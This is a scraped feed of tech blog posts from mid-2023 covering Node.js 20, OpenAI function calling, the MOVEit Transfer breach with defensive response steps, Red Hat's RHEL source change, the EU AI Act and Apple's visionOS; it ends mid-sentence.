Deno\u0026rsquo;s security model and built-in tooling clearly influenced these additions. Bun\u0026rsquo;s focus on developer experience and performance is pushing Node to improve its own story. Competition in the JavaScript runtime space is producing better outcomes for everyone.\nMy Take # I\u0026rsquo;ve been writing Node.js since the 0.x days, and the trajectory of the project has been remarkable. From a scrappy runtime that relied entirely on npm for everything to a platform that includes testing, permissions, HTTP/2, worker threads, and diagnostic tools — Node has grown into a genuinely mature server-side runtime.\nThe test runner won\u0026rsquo;t replace Jest or Vitest for every project — those tools have richer ecosystems and more features. But for new projects, libraries, and smaller services, starting with node:test means one fewer dependency to manage, one fewer configuration to maintain, and one fewer tool to keep updated.\nThe permission model is the feature I\u0026rsquo;m most excited about long-term. It\u0026rsquo;s experimental today, but if the Node project continues to expand its scope — adding network permission controls, environment variable restrictions, and finer-grained filesystem policies — it could fundamentally improve the security story for Node.js applications.\nNode 20 deserves more attention than it\u0026rsquo;s getting. 
Sometimes the most important features aren\u0026rsquo;t the flashiest.\nThis post is part of my Developer Landscape series, tracking the tools and platforms that shape modern software development.\n","date":"13 July 2023","externalUrl":null,"permalink":"/posts/230713-nodejs-20-test-runner-permission-model/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Node.js 20 brings a stable built-in test runner and an experimental permission model — two features that signal a maturing runtime taking security and developer experience seriously.","title":"Node.js 20: The Built-in Test Runner and Permission Model Change the Game","type":"posts"},{"content":"If you\u0026rsquo;ve been building applications with the OpenAI API, you\u0026rsquo;ve probably hit the same wall I have: getting structured, reliable output from a language model is surprisingly hard. You send a prompt asking for JSON, and sometimes you get JSON, sometimes you get JSON wrapped in markdown code blocks, and sometimes you get a friendly paragraph explaining what the JSON would look like. This is a fundamental challenge in production LLM systems, where reliability matters as much as capability. It\u0026rsquo;s the kind of inconsistency that makes production systems fragile.\nOpenAI\u0026rsquo;s function calling feature, released a few weeks ago alongside the new GPT-3.5-turbo and GPT-4 model updates, changes this dynamic fundamentally. It\u0026rsquo;s not just a quality-of-life improvement — it\u0026rsquo;s a paradigm shift in how we build LLM-powered applications.\nHow Function Calling Works # The concept is elegantly simple. When you make an API call, you can define a set of functions with their parameters described as JSON Schema. 
The model then decides whether to call a function based on the conversation context, and if so, returns a structured JSON object with the function name and arguments — not the function\u0026rsquo;s result, but the call itself.\n{ \u0026#34;functions\u0026#34;: [ { \u0026#34;name\u0026#34;: \u0026#34;get_weather\u0026#34;, \u0026#34;description\u0026#34;: \u0026#34;Get the current weather for a location\u0026#34;, \u0026#34;parameters\u0026#34;: { \u0026#34;type\u0026#34;: \u0026#34;object\u0026#34;, \u0026#34;properties\u0026#34;: { \u0026#34;location\u0026#34;: { \u0026#34;type\u0026#34;: \u0026#34;string\u0026#34;, \u0026#34;description\u0026#34;: \u0026#34;City and country\u0026#34; }, \u0026#34;unit\u0026#34;: { \u0026#34;type\u0026#34;: \u0026#34;string\u0026#34;, \u0026#34;enum\u0026#34;: [\u0026#34;celsius\u0026#34;, \u0026#34;fahrenheit\u0026#34;] } }, \u0026#34;required\u0026#34;: [\u0026#34;location\u0026#34;] } } ] } The model doesn\u0026rsquo;t execute the function. It tells you what to call and with what arguments. Your application code handles the actual execution, passes the result back to the model, and the model incorporates it into its response. The model becomes an orchestration layer — understanding user intent and mapping it to your application\u0026rsquo;s capabilities.\nWhy This Matters More Than It Seems # Before function calling, building reliable LLM-powered tools required elaborate prompt engineering. You\u0026rsquo;d craft system messages that said things like \u0026ldquo;Always respond with valid JSON in the following format\u0026hellip;\u0026rdquo; and then build error handling for the inevitable cases where the model didn\u0026rsquo;t comply. Libraries like LangChain built entire abstraction layers to manage this unreliability.\nFunction calling solves this at the model level. The model has been fine-tuned to understand function definitions and produce valid calls. 
In my testing over the past few weeks, the reliability improvement is dramatic. Where I used to see 10-15% malformed outputs with prompt-based approaches, function calling produces correctly structured output essentially 100% of the time.\nBut the real power isn\u0026rsquo;t just structured output — it\u0026rsquo;s the ability to build genuine agent-like systems. Consider a customer support bot that can:\nLook up an order status (function: get_order_status) Initiate a return (function: create_return) Check product availability (function: check_inventory) Escalate to a human agent (function: escalate_ticket) The model decides which function to call based on the user\u0026rsquo;s message. No complex routing logic in your code. No intent classification model. The LLM handles the understanding; your code handles the execution.\nBuilding a Real Integration # I\u0026rsquo;ve spent the past couple of weeks rebuilding a side project — a natural language interface for infrastructure monitoring — using function calling. The difference in code complexity is remarkable.\nPreviously, the application had a multi-stage pipeline: parse user intent from the model\u0026rsquo;s text output, validate the parsed result, map it to internal functions, handle errors when parsing failed. It was about 400 lines of glue code that was fragile and hard to test.\nWith function calling, the pipeline collapsed to about 80 lines. Define the functions, send the message, receive the function call, execute it, return the result. The code reads like a straightforward API integration rather than an exercise in parsing unpredictable text.\nA few patterns I\u0026rsquo;ve found work well:\nKeep functions granular. Rather than one massive do_everything function, define small, focused functions. The model is better at selecting the right tool from a targeted set than navigating a complex parameter space.\nUse descriptions liberally. 
The function and parameter descriptions aren\u0026rsquo;t just documentation — they\u0026rsquo;re part of the model\u0026rsquo;s context for deciding when and how to use each function. Good descriptions dramatically improve accuracy.\nHandle the conversation loop. Function calling often requires multiple turns: the model calls a function, you return the result, the model processes it and potentially calls another function. Build your application to handle this loop naturally.\nValidate inputs anyway. The model produces well-structured JSON, but you should still validate the actual values. A correctly formatted but nonsensical parameter value is still a bug.\nThe Competitive Landscape Shifts # Function calling isn\u0026rsquo;t just a feature — it\u0026rsquo;s OpenAI staking out the \u0026ldquo;AI as orchestration layer\u0026rdquo; position. By making it trivially easy to connect GPT to external tools and data sources, they\u0026rsquo;re positioning themselves as the brain that coordinates your entire application stack.\nThis puts pressure on every other LLM provider. Anthropic\u0026rsquo;s Claude, Google\u0026rsquo;s PaLM, open-source models like Llama — they\u0026rsquo;ll all need equivalent capabilities to compete for developer adoption. The models that can reliably interface with external tools will win the application layer.\nFor developers, this is broadly positive. Competition drives improvement, and the pattern OpenAI has established — model as function router — is clean enough that it can be implemented across different providers. I expect we\u0026rsquo;ll see open-source frameworks standardizing this pattern within months.\nMy Take # I\u0026rsquo;ve been building software long enough to recognize genuine capability shifts versus marketing hype. Function calling is the former. 
It takes LLMs from \u0026ldquo;impressive demo\u0026rdquo; to \u0026ldquo;production-ready component\u0026rdquo; for a whole class of applications.\nThe pattern of model-as-orchestrator, with your code handling the actual capabilities, is the right architecture. It keeps the model doing what it\u0026rsquo;s good at (understanding intent, handling ambiguity) while your deterministic code handles what it\u0026rsquo;s good at (reliable execution, data access, business logic).\nIf you\u0026rsquo;re building LLM-powered applications — or considering it — function calling should be the foundation of your architecture. The era of parsing free-text model output with regex and prayers is mercifully ending.\nWe\u0026rsquo;re still in the early days of figuring out the right patterns for LLM-powered applications. But function calling feels like the kind of primitive that everything else gets built on top of. It\u0026rsquo;s the XMLHttpRequest moment for AI-powered development — not exciting on its own, but transformative in what it enables.\nThis is part of my AI in Development series, exploring how AI tools and techniques are becoming part of the everyday developer toolkit.\n","date":"6 July 2023","externalUrl":null,"permalink":"/posts/230706-openai-function-calling-developer-workflows/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI’s function calling capability transforms GPT models from text generators into programmable agents — here’s what it means for developers building real applications.","title":"OpenAI's Function Calling Changes Everything About Building with LLMs","type":"posts"},{"content":"The scale of the MOVEit Transfer breach keeps expanding. What started as a single zero-day vulnerability disclosure at the end of May has now ballooned into one of the largest mass-exploitation events of the year. 
Hundreds of organizations are confirmed affected, from government agencies to major corporations, with the Cl0p ransomware gang claiming responsibility and methodically leaking data from organizations that refuse to pay.\nEvery week brings new victims. The BBC, British Airways, Shell, the US Department of Energy, multiple US state governments, universities, and financial institutions — the list grows daily. And we\u0026rsquo;re likely still in the early stages of understanding the full blast radius.\nThe Vulnerability Chain # The initial vulnerability, CVE-2023-34362, is a SQL injection flaw in the MOVEit Transfer web application. It\u0026rsquo;s about as classic as vulnerabilities get — an unauthenticated attacker can send crafted requests to the application endpoint and execute arbitrary SQL against the backend database. From there, it\u0026rsquo;s trivial to exfiltrate data or deploy webshells for persistent access.\nProgress Software, the maker of MOVEit, patched the initial flaw on May 31. But the damage was already done. Cl0p had been exploiting the vulnerability since at least late May, quietly exfiltrating data from hundreds of MOVEit instances before anyone knew what was happening.\nThen it got worse. On June 9, a second vulnerability (CVE-2023-35036) was discovered during code review prompted by the first. On June 15, a third (CVE-2023-35708). Each required emergency patches. The pattern suggests that MOVEit\u0026rsquo;s codebase has deep-seated security issues that weren\u0026rsquo;t caught during development. When you find one SQL injection bug, there are usually more.\nWhy Managed File Transfer Is a Perfect Target # If you\u0026rsquo;ve worked in enterprise IT, you know managed file transfer (MFT) tools. They\u0026rsquo;re the workhorses that move sensitive data between organizations — financial records, healthcare data, HR files, legal documents. 
They\u0026rsquo;re often internet-facing by design, because they need to receive files from external partners.\nThis makes them perfect targets:\nInternet-facing: They have to be accessible, which means they\u0026rsquo;re in the attacker\u0026rsquo;s crosshairs\nHigh-value data: The files passing through MFT systems are exactly what attackers want\nTrusted position: MFT tools often have access to internal networks and databases\nSlow to patch: Organizations running critical file transfer infrastructure are often reluctant to apply patches quickly for fear of breaking integrations\nLegacy codebases: Many MFT products have been around for decades, with code written before modern security practices were standard\nThe MOVEit breach follows the same playbook as the Accellion FTA exploitation in late 2020 and early 2021, and the GoAnywhere MFT breach earlier this year. Cl0p has been systematically targeting MFT platforms. They\u0026rsquo;ve found a lucrative niche.\nThe Supply Chain Dimension # What makes MOVEit particularly devastating is the supply chain amplification. Many affected organizations weren\u0026rsquo;t running MOVEit themselves — they were sharing data with a partner or vendor that was. Zellis, a UK-based payroll provider, used MOVEit to process payroll data. When Zellis was breached, the personal data of employees at the BBC, British Airways, Boots, and Aer Lingus was exposed.\nThis is the supply chain risk that security professionals have been warning about for years, manifested in the most straightforward way possible. Your security posture isn\u0026rsquo;t just about your own systems — it\u0026rsquo;s about every third party that touches your data.\nFor DevOps teams and infrastructure engineers, this should prompt some uncomfortable questions:\nDo you know every file transfer mechanism in your organization? Not just the official MFT platform, but the SFTP servers, the shared drives, the \u0026ldquo;temporary\u0026rdquo; solutions that became permanent. 
\nWhat data flows through these systems? Can you map the sensitivity of the data being transferred?\nHow quickly can you patch internet-facing file transfer services? If the answer is \u0026ldquo;weeks,\u0026rdquo; you have a problem.\nDo your vendor contracts include security requirements for data handling? And do you verify compliance?\nWhat We Should Be Doing # The immediate response to MOVEit is patch, investigate, and contain. But the broader lesson is about the security of data-in-transit infrastructure.\nIn my experience, file transfer systems are among the most neglected components in enterprise security programs. They\u0026rsquo;re \u0026ldquo;boring\u0026rdquo; infrastructure — not as exciting as cloud-native services or AI platforms. They don\u0026rsquo;t get the attention or investment that web applications or API gateways receive. But they process some of the most sensitive data in the organization.\nA few practical steps that every team should consider:\nInventory your file transfer systems. All of them. Including the ones running on that server in the corner that nobody wants to touch.\nMinimize exposure. Not every MFT instance needs to face the internet. VPNs, IP whitelisting, and zero-trust networking can reduce the attack surface.\nMonitor aggressively. Unusual data volumes, unexpected access patterns, new files appearing in transfer directories — these are signals that something is wrong.\nEncrypt data at rest, not just in transit. If an attacker compromises the MFT server, encrypted data at rest limits the damage.\nReview vendor security. If your partners are moving your data through tools like MOVEit, their security is your security.\nMy Take # I\u0026rsquo;ve seen enough breaches over the years to know that the biggest ones rarely involve exotic zero-days in cutting-edge software. They involve mundane vulnerabilities in mundane systems that handle extraordinarily sensitive data. 
MOVEit is a textbook example.\nThe Cl0p gang isn\u0026rsquo;t doing anything technically sophisticated here. SQL injection in a web application? We\u0026rsquo;ve known how to prevent that for twenty years. The sophistication is in the targeting — identifying that MFT platforms are high-value, widely deployed, and poorly defended.\nThis breach will keep expanding for weeks, possibly months. If your organization uses MOVEit — or any MFT platform — treat this as a wake-up call. And if you\u0026rsquo;re involved in DevOps or infrastructure, make sure file transfer systems get the same security attention as everything else in your stack.\nThis is part of my Security in Practice series, examining real-world security incidents and their implications for developers and infrastructure teams.\n","date":"29 June 2023","externalUrl":null,"permalink":"/posts/230629-moveit-breach-supply-chain-security/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The MOVEit Transfer vulnerability has now impacted hundreds of organizations worldwide — a stark reminder that managed file transfer tools remain critical and under-secured attack surfaces.","title":"MOVEit Transfer: The Supply Chain Breach That Keeps Growing","type":"posts"},{"content":"Red Hat dropped a bombshell yesterday. They announced that CentOS Stream will be the sole repository for public RHEL-related source code going forward. The complete RHEL source, previously available through their Git infrastructure, will now only be accessible to paying customers and partners through the customer portal.\nLet me be direct: this is a seismic shift for the enterprise Linux ecosystem, and the implications run far deeper than the immediate headlines suggest.\nWhat Actually Changed # To understand why this matters, you need to understand the ecosystem Red Hat built — and that others built around it. For over two decades, RHEL source code has been publicly available. 
This wasn\u0026rsquo;t charity; it was a legal obligation under the GPL. Red Hat\u0026rsquo;s business model was built on selling support, not software. The code was free; the expertise to run it in production was what you paid for.\nThis public availability spawned an entire ecosystem of downstream distributions. CentOS was the most prominent — a free, community-maintained rebuild of RHEL, bug-for-bug compatible. When Red Hat acquired CentOS in 2014 and then converted it to CentOS Stream (a rolling preview of RHEL rather than a rebuild) in late 2020, alternatives like Rocky Linux and AlmaLinux emerged to fill the gap.\nNow Red Hat is going further. While they claim they\u0026rsquo;re still GPL-compliant — the source is available to customers, who can redistribute it — they\u0026rsquo;ve effectively cut off the downstream rebuilders at the knees. Rocky Linux, AlmaLinux, and Oracle Linux all depended on that public source access to create their RHEL-compatible distributions.\nThe GPL Compliance Question # Red Hat\u0026rsquo;s position is legally defensible but ethically murky. The GPL requires that source code be made available to those who receive the binary. RHEL customers get the source. What Red Hat appears to be doing is using their customer agreements to discourage redistribution — not technically violating the GPL, but certainly violating its spirit.\nTheir blog post accompanying the announcement characterized the downstream rebuilders as companies that add \u0026ldquo;value\u0026rdquo; by stripping out Red Hat trademarks and rebuilding the code. The tone was dismissive, framing these projects as freeloaders rather than ecosystem participants.\nThis framing conveniently ignores that CentOS and its successors served as a massive on-ramp to RHEL. Countless organizations started on CentOS, grew their operations, and eventually became paying RHEL customers. 
The free ecosystem was Red Hat\u0026rsquo;s best sales funnel.\nImpact on the Enterprise Stack # If you\u0026rsquo;re running infrastructure, this matters to you directly. Millions of servers worldwide run CentOS, Rocky Linux, or AlmaLinux. These distributions are embedded in CI/CD pipelines, container base images, development environments, and production workloads.\nDocker Hub is full of images based on CentOS and its derivatives. Cloud providers offer these distributions as first-class options. The ripple effects of the rebuilders losing access to timely source code will be felt across the entire cloud-native ecosystem.\nFor my own infrastructure work, I\u0026rsquo;ve used CentOS and later Rocky Linux extensively in development environments that mirror RHEL production deployments. The value proposition was simple: identical behavior without the licensing cost for non-production workloads. That model is now under threat.\nThe downstream projects are already exploring alternatives. Rocky Linux has mentioned working with sources obtained through legitimate customer access, and AlmaLinux is evaluating whether to continue tracking RHEL precisely or diverge slightly. But none of these paths are as clean as the previous arrangement.\nThe Bigger Picture: Open Source Sustainability # This move by Red Hat is part of a broader pattern in the open-source world. Companies that built empires on open-source software are increasingly looking for ways to capture more value. MongoDB\u0026rsquo;s switch to SSPL, Elastic\u0026rsquo;s license change, HashiCorp\u0026rsquo;s recent moves with Terraform — the trend is clear.\nThe fundamental tension hasn\u0026rsquo;t changed in 30 years: open source creates enormous value, but capturing that value as a business is genuinely hard. Cloud providers can offer managed versions of open-source databases without contributing back. 
Competitors can rebuild your distribution without paying for the R\u0026amp;D.\nI sympathize with the business challenge. What I don\u0026rsquo;t sympathize with is the narrative that frames this as anything other than what it is: a company changing the terms of an ecosystem it nurtured, because the original terms became inconvenient. Red Hat built its reputation on open source. IBM acquired Red Hat for $34 billion largely because of that reputation. Now IBM\u0026rsquo;s influence is visible in the prioritization of revenue extraction over community trust.\nMy Take # I\u0026rsquo;ve been using and contributing to Linux distributions since the mid-\u0026rsquo;90s. The strength of the Linux ecosystem has always been its openness — not just legally, but culturally. Red Hat was a cornerstone of that culture.\nThis decision won\u0026rsquo;t kill enterprise Linux. It won\u0026rsquo;t even kill the RHEL-compatible rebuilds; they\u0026rsquo;ll find workarounds. But it damages something harder to quantify: trust. The open-source community operates on a social contract that goes beyond licenses. When a company that owes its existence to that contract starts looking for loopholes, it poisons the well for everyone.\nIf you\u0026rsquo;re making infrastructure decisions right now, it\u0026rsquo;s worth considering what this means for your long-term strategy. Debian and Ubuntu-based stacks look increasingly attractive for workloads where RHEL compatibility isn\u0026rsquo;t strictly required. Diversifying your base OS strategy has never been more prudent.\nThe enterprise Linux landscape is shifting. 
How it settles will tell us a lot about the future of open source in the corporate era.\nThis post is part of my Developer Landscape series, covering the trends shaping how we build and deploy software.\n","date":"22 June 2023","externalUrl":null,"permalink":"/posts/230622-red-hat-rhel-source-code-controversy/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Red Hat’s decision to restrict public access to RHEL source code sends shockwaves through the enterprise Linux ecosystem and raises fundamental questions about open source sustainability.","title":"Red Hat Locks Down RHEL Source Code — Open Source Has a Trust Problem","type":"posts"},{"content":"Yesterday, the European Parliament voted to approve the AI Act with a decisive majority. It\u0026rsquo;s the first comprehensive regulatory framework for artificial intelligence anywhere in the world, and whether you\u0026rsquo;re building AI systems in Europe or not, this is going to shape how we develop and deploy AI for years to come.\nHaving watched regulation cycles in tech for three decades — from data protection directives to GDPR — I can tell you this vote matters more than most developers realize. The AI Act doesn\u0026rsquo;t just affect the big players. It reaches deep into the development stack.\nThe Risk-Based Framework # The Act classifies AI systems into four risk categories: unacceptable, high, limited, and minimal risk. Unacceptable risk systems — things like social scoring by governments or real-time biometric surveillance in public spaces — are banned outright. High-risk systems face the strictest requirements: think AI used in hiring, credit scoring, law enforcement, or critical infrastructure.\nWhat\u0026rsquo;s interesting from a developer\u0026rsquo;s perspective is the high-risk category. 
If you\u0026rsquo;re building an AI-powered recruitment screening tool, a medical diagnostic assistant, or an automated loan approval system, you\u0026rsquo;ll need to implement:\nRisk management systems throughout the AI lifecycle\nData governance with strict requirements on training data quality\nTechnical documentation that would make most engineering teams sweat\nHuman oversight mechanisms built into the system design\nAccuracy, robustness, and cybersecurity standards\nThe documentation requirements alone are substantial. You need to be able to explain how your training data was collected, what biases exist, and how you\u0026rsquo;ve mitigated them. For teams used to moving fast and iterating, this is a significant shift in how you approach the development lifecycle.\nGeneral-Purpose AI Models Get Special Treatment # One of the more contentious additions during the parliamentary process was the treatment of general-purpose AI (GPAI) models — essentially foundation models like GPT-4, PaLM, and their open-source counterparts. The Parliament\u0026rsquo;s version requires GPAI providers to:\nDisclose that content was generated by AI\nDesign models to prevent generation of illegal content\nPublish summaries of copyrighted training data used\nThat last point is going to be particularly thorny. The transparency requirements around training data are something the major AI labs have been actively avoiding. OpenAI, Google, and others have been increasingly opaque about what data goes into their models. The EU is pushing back hard on that.\nFor developers building on top of these foundation models — through APIs, fine-tuning, or otherwise — there\u0026rsquo;s a cascade effect. If the foundation model provider needs to comply, the requirements flow downstream. You\u0026rsquo;ll need to understand what compliance obligations transfer to you as an application developer. 
Later development of AI Act compliance frameworks would clarify these requirements.\nThe Open Source Question # There\u0026rsquo;s been significant debate about how the Act treats open-source AI. The current text includes some exemptions for open-source components, but the boundaries are fuzzy. If you release an open-source model that gets used in a high-risk application, where does your responsibility end?\nThe Parliament\u0026rsquo;s position seems to be that open-source developers aren\u0026rsquo;t automatically liable for downstream uses, but the trilogue negotiations with the Council and Commission will determine the final language. The GPAI compliance rules that emerged would provide more specific guidance on these obligations. This is something the open-source AI community needs to watch very closely.\nI\u0026rsquo;ve been involved in open-source projects for most of my career, and regulatory uncertainty is poison for community-driven development. Clear carve-outs for open-source research and development are essential, or we risk pushing AI innovation entirely behind corporate walls.\nWhat Happens Next # The parliamentary vote is a major milestone, but it\u0026rsquo;s not the finish line. The trilogue — three-way negotiations between the Parliament, European Council, and European Commission — starts now. This is where the real horse-trading happens. The Council\u0026rsquo;s version of the Act is notably less strict in several areas, so expect some watering down.\nEven after agreement, there\u0026rsquo;s a transition period. Most obligations won\u0026rsquo;t kick in for 18 to 24 months after the final text is adopted. 
But if you\u0026rsquo;re planning AI-powered products or services, the time to start thinking about compliance architecture is now, not when the clock is ticking.\nMy Take # I\u0026rsquo;ve been through enough regulatory cycles to know that the initial developer reaction is usually panic, followed by resignation, followed by \u0026ldquo;actually, this isn\u0026rsquo;t so bad.\u0026rdquo; GDPR followed exactly that pattern. The companies that took it seriously early gained a competitive advantage.\nThe AI Act will be similar. Yes, the compliance burden is real, especially for high-risk applications. But the frameworks it requires — risk assessment, documentation, human oversight, data governance — are things we should be doing anyway. Most AI failures I\u0026rsquo;ve seen in production trace back to exactly the gaps this regulation targets: poor training data quality, no human fallback, inadequate testing for bias.\nThe developers and teams who build these practices into their workflows now will be ahead of the curve. The ones who wait for the final text and then scramble will be playing catch-up.\nWhether you agree with every provision or not, comprehensive AI regulation was inevitable. The EU fired the first shot. Others will follow. Best to be ready. 
The practical compliance implications for development teams would only grow more important as the Act took effect.\nThis is part of my ongoing series on AI in Development, tracking how artificial intelligence is reshaping the software engineering landscape.\n","date":"15 June 2023","externalUrl":null,"permalink":"/posts/230615-eu-ai-act-parliament-vote/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The European Parliament’s approval of the AI Act marks the first comprehensive AI regulation framework — here’s what developers building AI systems need to know.","title":"The EU AI Act Passes Parliament — What It Means for Developers","type":"posts"},{"content":"Apple\u0026rsquo;s WWDC keynote on Monday was one of those rare events where you watch a product announcement and genuinely don\u0026rsquo;t know what to think. The Apple Vision Pro is a $3,499 mixed reality headset with an entirely new operating system — visionOS — and a full development SDK. After spending the week digesting the sessions and documentation, I have thoughts. Some excited. Some skeptical. All uncertain.\nThe Hardware Proposition # Let me get the specs out of the way: dual Apple M2 and R1 chips, micro-OLED displays with reportedly stunning resolution, eye tracking, hand tracking, and a spatial audio system. The R1 chip is dedicated to processing sensor data with a claimed 12-millisecond photon-to-display latency, which is critical for avoiding motion sickness.\nAt $3,499, this is clearly a developer kit and early-adopter product disguised as a consumer launch. Apple isn\u0026rsquo;t saying that out loud — they\u0026rsquo;ve positioned it as \u0026ldquo;one more thing\u0026rdquo; with slick marketing — but the pricing tells the story. The interesting question isn\u0026rsquo;t whether consumers will buy this in 2024 when it ships. 
The interesting question is whether developers will build for it.\nvisionOS: A Genuine Platform Play # This is where WWDC gets interesting from a technical perspective. Apple didn\u0026rsquo;t just slap ARKit onto an iPad strapped to your face. visionOS is a new platform with its own UI paradigms, its own spatial layout system, and deep integration with the existing Apple development ecosystem.\nThe development model comes in three tiers:\nCompatible apps: Existing iPad and iPhone apps run in visionOS with minimal or no modification. They appear as flat windows in the spatial environment. This is Apple\u0026rsquo;s clever way of ensuring the platform has apps from day one — your SwiftUI app probably already works.\nWindow-based spatial apps: Using the new SwiftUI extensions for visionOS, you can create apps with windows that exist in 3D space. Windows can have depth, respond to spatial input (eye tracking + hand gestures), and coexist with other apps in the shared space. If you know SwiftUI, the learning curve here is manageable.\nFully immersive experiences: Using RealityKit and its new visionOS APIs, you can build fully immersive applications that take over the user\u0026rsquo;s entire visual field. This is the tier for games, training simulations, and specialized professional tools.\nThe developer documentation is already comprehensive, and Xcode 15 beta includes a visionOS simulator. Apple has clearly been working on the developer tools for years — the SDK doesn\u0026rsquo;t feel rushed.\nSwiftUI as the Foundation # The most significant technical decision Apple made is centering visionOS development on SwiftUI. If you\u0026rsquo;ve been building iOS apps with UIKit and have been putting off the SwiftUI migration, Apple just gave you a very compelling reason to accelerate that transition.\nThe new spatial APIs extend SwiftUI\u0026rsquo;s declarative model in ways that feel natural. 
You can add depth to views, create 3D objects using Model3D, and define volumetric windows with WindowGroup using the .volumetric window style. The gesture system extends to spatial interactions — a tap is now a pinch, a long press is a pinch-and-hold, and custom gestures can use eye tracking data.\nFor web developers, Apple also announced that Safari on visionOS supports WebXR, which means web-based spatial experiences are possible without native development. Given how important the web has been for platform adoption historically, this is a smart inclusion.\nThe Developer Economics Question # Here\u0026rsquo;s where my skepticism kicks in. Every new Apple platform starts with a gold rush of developer enthusiasm, followed by the hard reality of user base economics. The Apple Watch went through this cycle — early apps were pulled by major developers when usage didn\u0026rsquo;t justify the investment. Apple TV had a similar trajectory.\nVision Pro at $3,499 will have a small initial user base. Very small. Apple will probably sell it in the hundreds of thousands in the first year, maybe low millions if we\u0026rsquo;re optimistic. That means the addressable market for paid visionOS apps is tiny. The developers who build for it initially will be doing so as a strategic bet, not because the near-term economics make sense.\nThe counterargument is that compatible iPad apps work out of the box, so there\u0026rsquo;s no incremental cost for basic support. And Apple has a track record of driving platform adoption through iterative hardware improvements and price reductions. If Vision Pro follows the trajectory of AirPods — starting premium and eventually becoming mainstream — the early developers will have a significant advantage.\nWhat This Means for Development Teams # If you\u0026rsquo;re leading a software team, here\u0026rsquo;s my pragmatic advice:\nDon\u0026rsquo;t drop everything to build for visionOS. 
The user base won\u0026rsquo;t justify significant investment for at least 2-3 years. Do invest in SwiftUI if you haven\u0026rsquo;t. It\u0026rsquo;s now clearly Apple\u0026rsquo;s future across all platforms, and visionOS is the strongest signal yet. Evaluate your compatibility story. If you have an iPad app, test it in the visionOS simulator when Xcode 15 is stable. Fix any issues so you\u0026rsquo;re on the platform from launch. Explore if your domain has a spatial computing angle. Data visualization, 3D modeling, remote collaboration, and training are all domains where spatial computing could be genuinely transformative. Watch the enterprise play. Apple is clearly interested in professional use cases — the custom optic inserts for prescription lenses, the emphasis on productivity workflows, and the enterprise management capabilities suggest they see business adoption as important. My Take # I\u0026rsquo;ve watched every major computing platform launch of the last thirty years, and the Vision Pro reveal has a quality that reminds me of the original iPhone announcement. Not because the first product will be perfect — it won\u0026rsquo;t be — but because Apple has clearly thought deeply about the software platform, not just the hardware. The developer tools are mature, the migration path from existing skills is gentle, and the integration with the Apple ecosystem is thorough.\nThat said, I\u0026rsquo;m not buying one on launch day, and I\u0026rsquo;m not pivoting any of my projects to visionOS yet. The smart play is to invest in SwiftUI skills, keep an eye on the developer community\u0026rsquo;s early experiments, and be ready to move when the user base justifies it. Apple has planted a flag in spatial computing. Whether that flag marks the next revolution or another interesting-but-niche platform remains to be seen. 
The developer tools, at least, suggest Apple is betting heavily on the former.\n","date":"8 June 2023","externalUrl":null,"permalink":"/posts/230608-apple-wwdc-2023-visionos-developer-platform/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Apple announces Vision Pro and visionOS at WWDC 2023, creating an entirely new spatial computing development platform that raises big questions for software teams.","title":"WWDC 2023 — visionOS and What Apple's Spatial Computing Means for Developers","type":"posts"},{"content":"If you\u0026rsquo;re running Progress Software\u0026rsquo;s MOVEit Transfer in your environment, stop reading this and go patch immediately. CVE-2023-34362 is a critical SQL injection vulnerability in MOVEit Transfer\u0026rsquo;s web application that allows unauthenticated attackers to gain access to the database — and it\u0026rsquo;s been actively exploited in the wild since at least late May. This is shaping up to be one of the most significant supply chain security incidents of the year.\nWhat We Know So Far # MOVEit Transfer is a managed file transfer (MFT) solution used by thousands of organizations to move sensitive data between partners, clients, and internal systems. Think payroll data, healthcare records, financial documents — exactly the kind of data that makes attackers salivate.\nThe vulnerability is a SQL injection flaw in the web application component. An unauthenticated attacker can send a crafted request to the MOVEit Transfer web application that results in unauthorized access to the MOVEit database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker can infer information about the structure and contents of the database and execute SQL statements that alter or delete database elements.\nProgress Software released a patch on May 31, along with a detailed advisory. 
They recommend immediate patching and provide indicators of compromise (IOCs) for organizations to check whether they\u0026rsquo;ve already been compromised. The key IOC to look for is a webshell file named human2.aspx in the wwwroot folder of the MOVEit installation.\nSecurity researchers at Mandiant and Rapid7 have confirmed mass exploitation is underway. The attacks appear to have started as early as May 27, meaning there was a window of at least four days where organizations were being actively compromised before a patch was available.\nThe MFT Attack Surface Problem # This isn\u0026rsquo;t the first time managed file transfer solutions have been targeted in high-profile attacks. In January, the Clop ransomware group exploited a zero-day in Fortra\u0026rsquo;s GoAnywhere MFT, compromising over 130 organizations. Before that, Accellion\u0026rsquo;s legacy FTA product was exploited in 2020-2021, affecting dozens of organizations including Shell, Kroger, and multiple universities.\nMFT solutions are attractive targets for a specific reason: they sit at the boundary of organizations and handle the most sensitive data by design. They\u0026rsquo;re often exposed to the internet (necessarily, for file transfer functionality), and they aggregate data from multiple sources. Compromising an MFT solution is like hitting a data warehouse — you get access to sensitive files from across the organization in a single breach.\nThe pattern is concerning. These products are often legacy enterprise software with codebases that predate modern secure development practices. They handle authentication, file storage, and web interfaces — a large attack surface with complex security requirements. 
And because they\u0026rsquo;re enterprise infrastructure rather than consumer-facing, they often don\u0026rsquo;t receive the same security scrutiny as more visible products.\nPractical Response Steps # If you have MOVEit Transfer in your environment, here\u0026rsquo;s what you should be doing right now:\nImmediate actions:\nApply the patch from Progress Software. If you can\u0026rsquo;t patch immediately, disable all HTTP and HTTPS traffic to your MOVEit Transfer environment by modifying firewall rules. The file transfer functionality through SFTP/FTP will continue to work. Check for the human2.aspx webshell in your MOVEit installation\u0026rsquo;s wwwroot directory. Review HTTP access logs for unexpected large data downloads or connections from unfamiliar IP addresses. Check for any unexpected files in the MOVEit Transfer directories. Investigation steps:\nReview Azure/IIS logs for evidence of SQL injection attempts — look for unusual query strings containing SQL syntax. Check for any new user accounts that were created without authorization. Examine database audit logs for unexpected queries or data exports. If you find evidence of compromise, assume all data in the MOVEit environment has been exfiltrated and begin your incident response process. The Broader Lesson # I\u0026rsquo;ve been in this industry long enough to feel a deep frustration with the recurring pattern here. Enterprise file transfer products keep getting popped with the same classes of vulnerabilities — SQL injection, authentication bypass, arbitrary file upload. These aren\u0026rsquo;t exotic attack techniques. SQL injection is a solved problem in modern web development 